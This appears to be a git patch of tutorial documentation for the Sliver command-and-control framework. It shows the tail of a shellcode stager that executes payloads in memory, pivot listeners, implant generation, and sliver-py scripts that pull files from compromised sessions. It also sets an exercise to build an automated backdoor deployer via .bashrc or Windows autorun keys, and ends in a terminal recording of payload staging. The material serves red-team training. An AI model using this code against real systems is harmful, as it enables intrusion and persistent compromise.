baseAddress, shellcode.Length);\n\n // Change memory region to RX\n VirtualProtect(\n baseAddress,\n (uint)shellcode.Length,\n MemoryProtection.ExecuteRead,\n out _);\n\n // Execute shellcode\n var hThread = CreateThread(\n IntPtr.Zero,\n 0,\n baseAddress,\n IntPtr.Zero,\n 0,\n out _);\n // Wait infinitely on this thread to stop the process exiting\n WaitForSingleObject(hThread, 0xFFFFFFFF);\n }\n }\n}\n```\n\n## References\n\n- [https://github.com/BishopFox/sliver/wiki/Stagers](https://github.com/BishopFox/sliver/wiki/Stagers)\n"},{"name":"5 - Pivots","content":"# Pivots\n\nPivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to.\n\nSliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only.\n\nIn both cases the workflow is relatively similar, as a first step select a session and setup a pivot listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > pivots tcp\n\n[*] Started tcp pivot listener :9898 with id 1\n\n[server] sliver (INNER_GO-KART) > pivots\n\n ID Protocol Bind Address Number Of Pivots\n==== ========== ============== ==================\n 1 TCP :9898 0\n```\n\nThe listening port and interface can be configured during creation.\n\nThe next step is to generate a payload that will connect to our listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > generate --tcp-pivot 127.0.0.1 --os macos\n\n[*] Generating new darwin/amd64 implant binary\n[*] Symbol obfuscation is enabled\n[*] Build completed in 12s\n[*] Implant saved to /Users/tester/tools/VALUABLE_SICK\n```\n\nExecuting this payload will cause it to connect back through our original implant and then back to our C2 server.\n"},{"name":"6 - Scripting","content":"## Sliver Reactions\n\nReactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events.\n\n```bash\nReactable Events:\n session-connected Triggered when a new session is opened to a target\n session-updated Triggered on changes to session metadata\nsession-disconnected Triggered when a session is closed (for any reason)\n canary Triggered when a canary is burned or created\n watchtower Triggered when implants are discovered on threat intel platforms\n loot-added Triggered when a new piece of loot is added to the server\n loot-removed Triggered when a piece of loot is removed from the server\n```\n\nLet’s go ahead and create a reaction to list the current directory and environment variables when a new session checks in.\n\n```bash\nreaction set -e \"session-connected\"\n\n[*] Setting reaction to: Session Opened\n\n? Enter commands: [Enter 2 empty lines to finish]pwd\nenv\n? Enter commands:\npwd\nenv\n\n[*] Set reaction to session-connected (id: 1)\n```\n\nThe reaction is now set, if you spin up a new session these commands will be automatically run on that session’s initial connection.\n\n```bash\n[*] Session 99c7a639 UNEXPECTED_PORTER - 127.0.0.1:59966 (test.local) - darwin/amd64 - Thu, 04 May 2023 09:04:58 CEST\n\n[*] Execute reaction: 'pwd'\n\n[*] /Users/tester\n\n[*] Execute reaction: 'env'\n\nPWD=/Users/tester\nCOLORTERM=truecolor\n...\n```\n\nYou can remove reactions using `reaction unset`.\n\nHowever, there are a couple of limitations to keep in mind when using reactions, first off these are run in the console you are currently using, which is not necessarily the server console. So if you are connected to a sliver server using the sliver client, if you disconnect the client the reactions are no longer running. \n\nSecondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript to connect to the server over gRPC, which we’ll cover in the next session.\n\n## Sliver-py\n\nFor the purposes of this tutorial we’ll write our extensions using Python3, however the same result is achievable using Typescript, Golang or any other language that can handle gRPC.\n\nFirst, install the sliver-py extension using pip.\n\n```bash\npip3 install sliver-py\n```\n\nSince our extension is essentially going to be another client connection to the sliver server, you’ll also need to enable multiplayer mode and generate a new profile\n\n```bash\n[server] sliver > multiplayer\n\n[*] Multiplayer mode enabled!\n\n[server] sliver > new-operator -n tester -l 127.0.0.1\n\n[*] Generating new client certificate, please wait ...\n[*] Saved new client config to: /Users/tester/tools/tester_127.0.0.1.cfg\n```\n\nWe now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. In this session we recommend using `ipython3` , you can install this by using pip:\n\n```html\npip3 install ipython3\n```\n\nWe first need to import a few dependencies, `SliverClientConfig` which is used to parse the client config we’ve just created and `SliverClient` which will handle the connection to the backend server.\n\n```bash\ntester@test ~/t/sliver> ipython3\nPython 3.9.16 (main, Dec 7 2022, 10:06:04)\nType 'copyright', 'credits' or 'license' for more information\nIPython 8.0.1 -- An enhanced Interactive Python. Type '?' for help.\n\nIn [1]: from sliver import SliverClientConfig, SliverClient\n\nIn [2]: DEFAULT_CONFIG = \"/Users/tester/tools/tester_127.0.0.1.cfg\"\n\nIn [3]: config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n\nIn [4]: client = SliverClient(config)\n\nIn [5]: await client.connect()\nOut[5]:\nMajor: 1\nMinor: 5\nPatch: 37\nCommit: \"0a43dc688ffb31a0a38511c47e8547a44a6918d4\"\nCompiledAt: 1681408237\nOS: \"darwin\"\nArch: \"arm64\"\n```\n\nFrom this point on we can use the client object to interact with the server, let’s start with listing any sessions or beacons that might be currently connected.\n\n```bash\nIn [6]: beacons = await client.beacons()\n\nIn [7]: sessions = await client.sessions()\n\nIn [8]: beacons\nOut[8]: []\n\nIn [9]: sessions\nOut[9]:\n[ID: \"f80ec897-0870-4f03-a1b1-364e5a0d243c\"\n Name: \"UNEXPECTED_PORTER\"\n Hostname: \"test.local\"\n UUID: \"c6de1a44-016a-5fbe-b76a-da56af41316d\"\n Username: \"tester\"\n UID: \"501\"\n GID: \"20\"\n OS: \"darwin\"\n Arch: \"amd64\"\n Transport: \"http(s)\"\n RemoteAddress: \"127.0.0.1:60218\"\n PID: 74773\n Filename: \"/Users/tester/tools/UNEXPECTED_PORTER\"\n LastCheckin: 1683185925\n ActiveC2: \"http://127.0.0.1\"\n ReconnectInterval: 60000000000\n PeerID: 4416183373589698218\n FirstContact: 1683185429]\n```\n\nTo run commands on this session you’ll need to create an InteractiveSession object.\n\n```bash\nIn [10]: interract = await client.interact_session(\"f80ec897-0870-4f03-a1b1-364e5a0d243c\")\n\nIn [11]: await interract.pwd()\nOut[11]: Path: \"/Users/tester\"\n```\n\nNow that we’ve got the basics of connecting to sliver and running commands down let’s write a more useful script that will display the hosts file when a new session checks in. Our goal is to first identify the Operating System, and then based on that retrieve and display the contents of the hosts file if it exists. Because this script will wait and react to events emitted by the Sliver server, we’re going to use `asyncio` to write our client.\n\n```bash\n#!/usr/bin/env python3\n\nimport os\nimport asyncio\nfrom sliver import SliverClientConfig, SliverClient\nimport gzip\n\nDEFAULT_CONFIG = \"/Users/tester/tools/neo_127.0.0.1.cfg\"\n\nasync def main():\n ''' Client connect example '''\n config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n client = SliverClient(config)\n await client.connect()\n\n\t\tasync for event in client.on('session-connected'):\n print('Session %s just connected !' % event.Session.ID)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n```\n\nAs shown above we can access the session object through `event.Session`. Let’s go ahead and add a few conditions based on the operating system.\n\n```bash\nif event.Session.OS == \"darwin\":\n print('Session is running on macOS')\n\nelif event.Session.OS == \"Linux\":\n print('Session is running on Linux')\nelif event.Session.OS == \"Windows\"\n print('Session is running on Windows')\nelse:\n print('Session is running on %s', event.Session.OS)\n```\n\nLet’s setup an InteractiveSession object like previously.\n\n```bash\ninteract = await client.interact_session(event.Session.ID)\n```\n\nWe’re going to start with writing the code for Linux and Macos, since in their case the file is located in the same place. First we check if the file exists, then we download and decompress it to display its contents using gzip.\n\n```bash\nfile_listing = await interact.ls(\"/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nThe code for Windows is relatively similar the only major difference being the file location.\n\n```bash\nfile_listing = await interact.ls(\"C:/Windows/System32/drivers/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"C:/Windows/System32/drivers/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nIf we run our script and spin up a few sessions we should start to see hosts files being retrieved.\n\n```bash\npython3.11 autocat.py\nAutomatically interacting with session 16338c85-b670-44ab-ac83-2df885654b07\nb\"# Copyright (c) 1993-2009 Microsoft Corp.\\r\\n#\\r\\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\\r\\n#\\r\\n# ...\n\nAutomatically interacting with session 93fcbab2-f00d-44a4-944a-e1ea8ec324e2\nb'##\\n# Host Database\\n#\\n# localhost is used to configure the loopback interface\\n# when the system is booting. Do not change this entry.\\n##\\n127.0.0.1...\n```\n\nAs an exercise, build automated backdoor deployer which first identifies the target operating system and then deploys a corresponding backdoor, in the case of Linux or Macos you can backdoor a `.bashrc` file to run a previously uploaded binary in the background, in the case of Windows you can use the registry commands to deploy a new `autorun` key.\n\nHere are a couple hints:\n\n- Start with generating sliver implants for all your target systems, on implant connection you’ll want to upload them somewhere on disc\n- In the cases of Linux and Macos you’ll want to download the `.bashrc` file, decompress and modify it locally before re-uploading it. The upload command should look like this `await interract.upload(\"/home/target/.bashrc\", contents + b'\\r\\necho \"pwned !\"')`.\n- For Windows you can look at the `registry_read` and `registry_create_key` functions.\n\n## References\n\n- [https://github.com/BishopFox/sliver/wiki/Writing-your-own-client](https://github.com/BishopFox/sliver/wiki/Writing-your-own-client)\n- [https://sliverpy.readthedocs.io/en/latest/](https://sliverpy.readthedocs.io/en/latest/)\n- [https://github.com/moloch--/sliver-py](https://github.com/moloch--/sliver-py)\n- [https://github.com/moloch--/sliver-script](https://github.com/moloch--/sliver-script)\n"},{"name":"7 - Assemblies and Bofs","content":""}]} \ No newline at end of file From 9543951747c7b69cb68ac8a0888eb956fbf2438b Mon Sep 17 00:00:00 2001 From: Tim Makram Ghatas <47985652+TimBF@users.noreply.github.com> Date: Thu, 2 May 2024 23:02:28 +0200 Subject: [PATCH 4/7] update http payload staging wiki --- .../tutorials/md/4 - HTTP Payload staging.md | 5 + .../asciinema/stage_compress_encrypt.cast | 788 ++++++++++++++++++ 2 files changed, 793 insertions(+) create mode 100644 docs/sliver-docs/public/asciinema/stage_compress_encrypt.cast diff --git a/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md index a08eb528ae..c65f47aa0d 100644 --- a/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md +++ b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md @@ -30,6 +30,11 @@ At this point we can try retrieving our implant, the ID is 19778. {"src": "/asciinema/implant_curl.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} ``` +Sliver staging also supports encoding or encrypting our payloads before exposing them extenrally using the `profile stage` command, the implant configuration remains the same but you are now able to stage different versions of it simultaneously. + +```asciinema +{"src": "/asciinema/stage_compress_encrypt.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} +``` ## Metasploit diff --git a/docs/sliver-docs/public/asciinema/stage_compress_encrypt.cast b/docs/sliver-docs/public/asciinema/stage_compress_encrypt.cast new file mode 100644 index 0000000000..b7410e1639 --- /dev/null +++ b/docs/sliver-docs/public/asciinema/stage_compress_encrypt.cast @@ -0,0 +1,788 @@ +{"version": 2, "width": 214, "height": 52, "timestamp": 1714674882, "env": {"SHELL": "/bin/bash", "TERM": "screen"}} +[0.141527, "o", "\u001b[?2004h"] +[0.150452, "o", "root@98df0494f659:~# "] +[0.821313, "o", "."] +[0.874166, "o", "/"] +[1.057214, "o", "s"] +[1.175243, "o", "l"] +[1.271121, "o", "i"] +[1.38579, "o", "v"] +[1.509307, "o", "e"] +[1.599597, "o", "r"] +[1.694155, "o", "-"] +[1.857931, "o", "s"] +[1.883648, "o", "e"] +[1.935441, "o", "r"] +[2.187186, "o", "v"] +[2.361525, "o", "e"] +[2.442158, "o", "r"] +[2.534032, "o", "\r\n\u001b[?2004l\r"] +[3.877761, "o", "\u001b[31m\r\r\n \t ██████ ██▓ ██▓ ██▒ █▓▓█████ ██▀███\r\r\n\t▒██ ▒ ▓██▒ ▓██▒▓██░ █▒▓█ ▀ ▓██ ▒ ██▒\r\r\n\t░ ▓██▄ ▒██░ ▒██▒ ▓██ █▒░▒███ ▓██ ░▄█ ▒\r\r\n\t ▒ ██▒▒██░ ░██░ ▒██ █░░▒▓█ ▄ ▒██▀▀█▄\r\r\n\t▒██████▒▒░██████▒░██░ ▒▀█░ ░▒████▒░██▓ ▒██▒\r\r\n\t▒ ▒▓▒ ▒ ░░ ▒░▓ ░░▓ ░ ▐░ ░░ ▒░ ░░ ▒▓ ░▒▓░\r\r\n\t░ ░▒ ░ ░░ ░ ▒ ░ ▒ ░ ░ ░░ ░ ░ ░ ░▒ ░ ▒░\r\r\n\t░ ░ ░ ░ ░ ▒ ░ ░░ ░ ░░ ░\r\r\n\t\t ░ ░ ░ ░ ░ ░ ░ ░\r\r\n\u001b[0m\r\nAll hackers gain miracle\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - 331faeb8ef9a1eb2d385d458a544014c6724f71f\r\r\n\u001b[1m\u001b[36m[*] \u001b"] +[3.878321, "o", "[0mWelcome to the sliver shell, please type 'help' for options\r\r\n"] +[3.881417, "o", "\r\n"] +[3.910333, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[3.912179, "o", "\u001b[1 q"] +[3.914283, "o", "\u001b[?25l"] +[3.914941, "o", "\u001b[214D"] +[3.91531, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[3.918263, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[3.918563, "o", "\r\r\n"] +[3.919435, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[5.073098, "o", "\u001b[?25l\u001b[214D"] +[5.078434, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.089176, "o", "p\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[5.177503, "o", "\u001b[?25l\u001b[214D"] +[5.180064, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.184517, "o", "pr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[5.288231, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.298034, "o", "pro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[5.397933, "o", "\u001b[?25l"] +[5.409413, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.419532, "o", "prof\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[5.489024, "o", "\u001b[?25l\u001b[214D"] +[5.489253, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.492109, "o", "profi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[14D\u001b[9C\u001b[214D\u001b[14C\u001b[?25h"] +[5.550034, "o", "\u001b[?25l\u001b[214D"] +[5.550644, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.554876, "o", "profil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[5.555348, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[15D\u001b[9C\u001b[214D\u001b[15C\u001b[?25h"] +[5.634582, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.63904, "o", "profile\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[5.639797, "o", "\u001b[214D\u001b[1A\u001b[16D\u001b[9C\u001b[214D\u001b[16C\u001b[?25h"] +[5.672997, "o", "\u001b[?25l"] +[5.674048, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.676912, "o", "\u001b[1m\u001b[32mprofiles\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m"] +[5.677839, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[17D\u001b[9C\u001b[214D\u001b[17C\u001b[?25h"] +[6.028625, "o", "\u001b[17D\u001b[9C\u001b[6n"] +[6.031804, "o", "\u001b[214D\u001b[17C\u001b[0J\u001b[214D\r\r\n"] +[6.035446, "o", "\u001b[0 q\r\n"] +[6.080003, "o", " Profile Name Implant Type Platform Command & Control Debug Format Obfuscation Limitations C2 Profile \r\n=============== ============== ============= ======================= ======= ============ ============= ============= ============\r\n rubyc2profile beacon linux/amd64 [1] https://localhost true EXECUTABLE disabled ruby \r\n"] +[6.081043, "o", "\r\n"] +[6.091251, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[6.091854, "o", "\u001b[1 q\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.093821, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[6.094635, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[6.548869, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.563285, "o", "p\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[6.624869, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[6.626342, "o", "\u001b[6n"] +[6.630476, "o", "pr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[6.631001, "o", "\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[6.720432, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.724932, "o", "pro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[6.725222, "o", "\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[6.865965, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[6.867793, "o", "\u001b[6n"] +[6.871524, "o", "prof\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[6.873212, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[6.947443, "o", "\u001b[?25l\u001b[214D"] +[6.949298, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.952834, "o", "profi\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[6.953139, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[14D\u001b[9C\u001b[214D\u001b[14C\u001b[?25h"] +[7.016834, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.021422, "o", "profil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D"] +[7.022957, "o", "\u001b[1A\u001b[15D\u001b[9C\u001b[214D\u001b[15C\u001b[?25h"] +[7.04583, "o", "\u001b[?25l"] +[7.047008, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.050574, "o", "profile\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[16D\u001b[9C\u001b[214D\u001b[16C\u001b[?25h"] +[7.104552, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[7.105269, "o", "\u001b[6n"] +[7.107419, "o", "\u001b[1m\u001b[32mprofiles\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[7.107546, "o", "\u001b[214D\u001b[1A\u001b[17D\u001b[9C\u001b[214D\u001b[17C\u001b[?25h"] +[7.402988, "o", "\u001b[?25l"] +[7.40837, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.417907, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[7.419024, "o", "\u001b[214D\u001b[1A\u001b[18D\u001b[9C\u001b[214D\u001b[18C\u001b[?25h"] +[7.691268, "o", "\u001b[?25l"] +[7.69341, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.699425, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22ms\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.701939, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[19D\u001b[9C\u001b[214D\u001b[19C\u001b[?25h"] +[7.748585, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[7.749144, "o", "\u001b[6n"] +[7.751257, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mst\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[7.751983, "o", "\u001b[214D\u001b[1A\u001b[20D\u001b[9C\u001b[214D\u001b[20C\u001b[?25h"] +[7.927016, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.939609, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22msta\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[21D\u001b[9C"] +[7.941154, "o", "\u001b[214D\u001b[21C\u001b[?25h"] +[8.078519, "o", "\u001b[?25l"] +[8.081521, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.090193, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstag\u001b[0m\u001b[0K\u001b[49m"] +[8.092062, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[22D\u001b[9C\u001b[214D\u001b[22C\u001b[?25h"] +[8.128257, "o", "\u001b[?25l\u001b[214D"] +[8.1305, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.13586, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[8.137217, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[23D\u001b[9C\u001b[214D\u001b[23C\u001b[?25h"] +[8.226354, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.230511, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D"] +[8.230643, "o", "\u001b[1A\u001b[24D\u001b[9C\u001b[214D\u001b[24C\u001b[?25h"] +[8.581286, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.589781, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[8.591277, "o", "\u001b[214D\u001b[1A\u001b[25D\u001b[9C\u001b[214D\u001b[25C\u001b[?25h"] +[8.845512, "o", "\u001b[?25l"] +[8.850584, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.86043, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-h\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[8.861929, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[26D\u001b[9C\u001b[214D\u001b[26C\u001b[?25h"] +[9.135602, "o", "\u001b[26D\u001b[9C\u001b[6n"] +[9.14604, "o", "\u001b[214D\u001b[26C\u001b[0J\u001b[214D\r\r\n"] +[9.147513, "o", "\u001b[0 q\r\n"] +[9.163342, "o", "\u001b[1mCommand:\u001b[0m stage [name] \r\n\t\u001b[1mAbout:\u001b[0m Generate and encrypt or encode an implant from a saved profile (see 'profiles stage --help').\r\n\r\n"] +[9.175319, "o", "Usage:\r\n profiles stage [flags]\r\n\r\nFlags:\r\n -i, --aes-encrypt-iv string AES Encryption IV\r\n -k, --aes-encrypt-key string AES Encryption Key\r\n -c, --compress string Compress stage (zlib, gzip, deflate9 or deflate)\r\n -h, --help help for stage\r\n -n, --name string Implant name\r\n -p, --prepend-size Prepend stage size\r\n -r, --rc4-encrypt-key string RC4 encryption key\r\n -s, --save string directory/file to the binary to\r\n\r\nGlobal Flags:\r\n -t, --timeout int grpc timeout in seconds (default 60)\r\n"] +[9.178545, "o", "\r\n"] +[9.191743, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[9.192339, "o", "\u001b[1 q\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[9.194427, "o", "\u001b[6n"] +[9.196681, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[9.197404, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[9.744219, "o", "\u001b[?25l"] +[9.750337, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[9.757572, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-h\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[9.758758, "o", "\u001b[214D\u001b[1A\u001b[26D\u001b[9C\u001b[214D\u001b[26C\u001b[?25h"] +[10.270204, "o", "\u001b[?25l"] +[10.271861, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.278797, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[10.279594, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[25D\u001b[9C\u001b[214D\u001b[25C\u001b[?25h"] +[10.662393, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.676439, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[24D\u001b[9C\u001b[214D\u001b[24C\u001b[?25h"] +[11.36124, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.372065, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[11.3737, "o", "\u001b[214D\u001b[1A\u001b[25D\u001b[9C\u001b[214D\u001b[25C\u001b[?25h"] +[11.748431, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.768073, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-c\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[11.769565, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[26D\u001b[9C\u001b[214D\u001b[26C\u001b[?25h"] +[11.87228, "o", "\u001b[?25l\u001b[214D"] +[11.876708, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.882255, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D"] +[11.883272, "o", "\u001b[1A\u001b[27D\u001b[9C\u001b[214D\u001b[27C\u001b[?25h"] +[12.589667, "o", "\u001b[?25l"] +[12.591899, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[12.597484, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22mz\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[12.599147, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[28D\u001b[9C\u001b[214D\u001b[28C\u001b[?25h"] +[12.712235, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[12.723138, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage 